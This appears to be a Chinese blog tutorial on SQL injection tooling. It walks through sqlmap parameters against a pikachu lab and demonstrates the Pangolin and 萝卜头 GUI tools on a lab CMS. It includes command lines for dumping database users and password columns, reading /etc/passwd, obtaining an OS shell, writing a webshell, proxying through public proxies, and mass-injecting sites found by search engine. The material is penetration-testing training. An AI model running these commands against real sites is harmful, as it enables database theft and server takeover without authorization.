建设汽车网站,用幽默的语言来形容网站开发,wordpress后台登陆界面,高德地图怎么看邮编一#xff0c;sqlmap 工具的详细使用
kali系统自带这个工具#xff0c;无需安装直接sqlmap 后面接参数使用
Windows上参照以下方法安装即可
1-1 工具下载
1-1-1 sqlmap下载
sqlmap 工具下载地址#xff1a;
GitHub - sqlmapproject/sqlmap: Automatic SQL injection a…一sqlmap 工具的详细使用
kali系统自带这个工具无需安装直接sqlmap 后面接参数使用
Windows上参照以下方法安装即可
1-1 工具下载
1-1-1 sqlmap下载
sqlmap 工具下载地址
GitHub - sqlmapproject/sqlmap: Automatic SQL injection and database takeover toolAutomatic SQL injection and database takeover tool - GitHub - sqlmapproject/sqlmap: Automatic SQL injection and database takeover toolhttps://github.com/sqlmapproject/sqlmap
下载以后是压缩包格式解压缩以后就有Python2.7环境就可以直接用了 这是一款Python2写的工具电脑需要安装Python2.7并配置好环境变量
1-1-2 安装Python2.7
1、通过 python 官网 找到 2.7 版本进行下载Welcome to Python.orgThe official home of the Python Programming Languagehttps://www.python.org/Python Release Python 2.7.18 | Python.orgThe official home of the Python Programming Languagehttps://www.python.org/downloads/release/python-2718/
2双击下载的安装包进行安装按提示操作即可。我的安装目录为 D:\ruanjian\Python27 3接下来配置环境变量
此电脑右击-------属性--------高级系统设置 ------- 环境变量 找到path双击 注意一个是Python.exe所在目录另一个是scripts目录需要配置两个 最后确定退出即可
如果你电脑只有一个Python则打开终端输入 python即可看到如下页面说明安装成功了 因为我电脑装了三个版本为了区分开我得输入python2才可以 到此Python安装成功
1-2 工具参数 1-2-1 -r 参数
GET请求或者POST请求都可以用-r参数后面可以跟一个网址或者一个数据包
以pikachu靶场为例先抓一个数据包过来 复制数据包内容在sqlmap.py所在目录下创建一个1.txt 把内容粘贴过去 在sqlmap.py目录下打开终端按住shift鼠标右击就可以看到终端就可以用了
python2 .\sqlmap.py -r .\1.txt 提示已经发现目标服务器用的是MySQL数据库是否继续探测是否用了其他数据库
既然已经发现是mysql数据库了就没必要去探测是不是用了别的数据库了所以输入n就可以
下面讲到了一个risk和level这两个参数说对所有测试是否保持默认等级先讲一下这两个参数吧 1-1 --riskRISK
工作当中常用的risk的值为3
python2 .\sqlmap.py -r .\1.txt --risk 3 执行测试的风险0-3默认为1默认是1会测试大部分的测试语句2会增加基于事件的测试语句3会增加or语句的sql注入测试 1-2 --levelLEVEL
工作当中常用的level的值为3 执行测试等级1-5默认是1使用-level 参数且数值 2的时候也会检查cookie里面的参数当3的时候会检查User-Agent 和 refer。 python2 .\sqlmap.py -r .\1.txt --level 3 --level 3 所以当level值越大检测的数据项就越多 拿出来的数据越多相对应的耗费的事件就比较长 所以对于这两个参数保持默认即可如果没有返回数据则可以调 已经有一些结果出来了
结尾提示说‘已经检测到参数id是可注入的是否继续测试别的参数’我们就选择n,或者你想测试别的参数能不能注入也可以输入y继续测试 已经有数据出来了SQL注入的类型数据库中间件相关的信息等 不过还没有获取数据想要获取数据我们就得继续学习其他数据
1-2-2 -v 参数 python2 .\sqlmap.py -r .\1.txt -v 5 显示详细信息的意思ERBOSE信息级别0-6默认为1 0只显示Python错误严重的信息 1同时显示基本信息和警告信息 2同时显示debug信息 3同时显示注入的payload 4同时显示HTTP请求 5同时显示HTTP响应头 6同时显示HTTP相应页面 比如说我们设置个5看看效果 显示的信息肯定会很多 1-2-3 -p 参数 python2 .\sqlmap.py -r .\1.txt -level 3 -p id
如果说我们通过 -r 指定的数据包中有多个参数则可以用-p指定对哪个参数进行SQL注入
我们现在指定的数据包中只有一个参数所以也只能只能一个参数了
我们指定了 -p id 则只针对id进行SQL注入如果数据包中还有别的参数也可以指定 1-2-4 --threads
这个参数不要调的很大避免短时间内给目标服务器发大量请求让服务器崩溃 线程数如果你想让sqlmap跑的更快可以更改这个线程数的数值默认为10 比如 --threads 20,跑的可以更快了 我们还可以对所有参数的默认值进行调整我们称之为sqlmap优化配置文件如下路径 1-2-5 -batch-smart python2 .\sqlmap.py -r .\1.txt -batch-smart
只能判断测试只能寻找注入点进行测试
他做的事情很多如果发现注入点给你自动进行注入获取数据不过效率不高一般很少使用 数据库连接用户都查出来了 下面提示要不要尝试爆破我们可以尝试爆破一下 然后及时各种一顿操作猛如虎发大量请求开始破解 这个智能指令会把数据库扒一遍而且会把数据结果输出到文件中
sqlmap/output/dump文件夹中没记错的话按日期存储的
1-2-6 -mobile 参数 python2 .\sqlmap.py -r .\1.txt -mobile
模拟测试手机的环境站点用的比较少如果有个网站只允许手机访问那么我们就可以用这个参数来模拟手机 每一次发包的时候把请求头User-Agent改成这些手机从而模拟手机的数据包
1-2-7 -m 参数
-m 是批量注入比如现在有多个数据包可以通过-m参数来批量注入
一般都是通过搜索引擎找到哦啊多个网站记录下来然后通过-m参数来对这些网站批量注入
比如我们现在准备多个网址放到2.txt中 python2 .\sqlmap.py -m .\2.txt 上面就是常用的参数接下来介绍一些别的参数
1-2-7 其他参数 --dbs # 会获取所有的数据库 //sqlmap会自动的探测web应用后端的数据库类型--current-user ##大多数数据库中可检测到数据库管理系统当前用户--current-db##当前连接数据库名--is-dba##判断当前的用户是否为管理员--users# 列出数据库所有所有用户 7-1 --dbs python2 .\sqlmap.py -r .\1.txt --dbs 7-2 --current-db python2 .\sqlmap.py -r .\1.txt --current-db
7-3 --current-user python2 .\sqlmap.py -r .\1.txt --current-user 7-4 --is-dba
python2 .\sqlmap.py -r .\1.txt --is-dba 7-5 --users
python2 .\sqlmap.py -r .\1.txt --users 7-6 -tables -D
获取表名
-D 指定数据库 python2 .\sqlmap.py -r .\1.txt --tables -D pikachu 7-7 --columns -T xx -D xx
python2 .\sqlmap.py -r .\1.txt --columns -T users -D pikachu
获取字段名
-T 指定表名
-D 指定数据库名 7-8 -T xx -C xx -D xx python2 .\sqlmap.py -r .\1.txt -C username,password -T users -D pikachu
读取字段内容
-T 指定表名
-C 指定字段名
-D 指定库名 提示结果已经输出到了文件当中 C盘按照提示的目录去找一下 7-8 --file-read
自己试一下我是win2003搭建的靶场这命令不太灵 python2 .\sqlmap.py -r .\1.txt --file-read /etc/password
7-9 --os-shell
这个是有前提条件的 1. mysql开启了secure_file_priv的配置 ---- 如何开启前面讲过了 2. 要知道网站代码的真实物理路径 ---------- 需要信息收集通过别的方法来直到真实路径 3. 物理路径具备写入权限 ----------- 要不然木马写不进去 4. 最好是mysql的root用户这个条件非必须但是有最好 假设我们知道了真实路径 C:\tools\phpstudy\PHPTutorial\WWW
python2 .\sqlmap.py -r .\1.txt --os-shell
pikachu是PHP开发的我们选四 让我们提供网站的路径给了几个选项第一个就是用sqlmap本身的字段去破解真实路径
第二个让我们自己提供第三个让我们指定一个爆破字典 我们就选2把真实路径输入进去 就这样getshell成功
7-10 –proxy-file
自己参考一下下面格式
python2 .\sqlmap.py -r .\1.txt -proxy-file .\2.txt
2.txt 文件内容如下
## 文件内容如下http://192.168.18.100:82http://192.168.18.101:82http://192.168.18.102:82http://192.168.18.103:82## 指令sqlmap -u http://192.168.18.26:82/sqlserver/1.aspx?xxser1 -proxy-file 1.txt## 代理ip我们可以去一些免费的网站找比如西祠代理和快代理
7-11 -proxy 代理链
自己参考一下下面格式
sqlmap -u http://192.168.18.26:82/sqlserver/1.aspx?xxser1 -proxy http://192.168.18.100:82## 快代理
sqlmap -u http://192.168.18.26:82/sqlserver/1.aspx?xxser1 -proxy http://183.21.81.188:41825
7-12 --force-ssl 查询SSL证书
自己参考一下下面格式
sqlmap -u https://192.168.18.26:82/sqlserver/1.aspx?xxser1 --force-ssl
7-13 --file-write 写webshell
自己参考一下下面格式
指令 --file-write c:/2.txt” --file-dest “C:/php/htdocs/sql.php” -v 1
--file-write c:/2.txt” --file-dest “C:\phpStudy\PHPTutorial\WWW\xx.php” -v 1
二穿山甲
需要工具或者靶场环境请留言工具靶场等我晚点上传到网盘上
以凡诺企业网站管理系统这个靶场为例进行演示
我们发现新闻中心这里存在注入点 工具就长这样把存在注入点的网址复制过来 我专门写过一篇博客就是对这个凡诺企业系统网站进行手动SQL注入链接如下
【网络安全-SQL注入】SQL注入----一篇文章教你access数据库SQL注入以及注入点利用。SQL注入【3】-CSDN博客本篇文章以凡诺企业网站管理系统为例讲解了access数据库是如何进行SQL注入的以及注入点如何利用如何判断查询字段个数如果用联合查询爆出数据库数据等;【网络安全-SQL注入】SQL注入----一篇文章教你access数据库SQL注入以及注入点利用。SQL注入【3】https://blog.csdn.net/m0_67844671/article/details/133469076?spm1001.2014.3001.5502
我们知道这是Access数据库id是个整数类型设置好了以后就开始 让我们选择获取哪些信息比如数据库路径网站根路径驱动信息等
我们选择所有点击开始 已经停止了看到stopped表示停止了点击获取数据 点击获取表 获取出来几个表了我们选中以后可以继续获取列获取数据 可以点击all获取所有数据 列信息已经获取了 先选中列点击获取数据开始获取数据库数据 工具差不多就讲到这里还是sqlmap功能比较强大平时sqlmap用的多
三萝卜头
还是以凡诺企业管理系统化为例
输入网址Database选择MsAccess 直接开始analyze就可以
可以看到下面已经有info消息了 点击tables 然后 GetDBs可以获取数据库继续GetTables可以获取表GetCumns可以获取列GetDate获取数据还有别的功能可以研究研究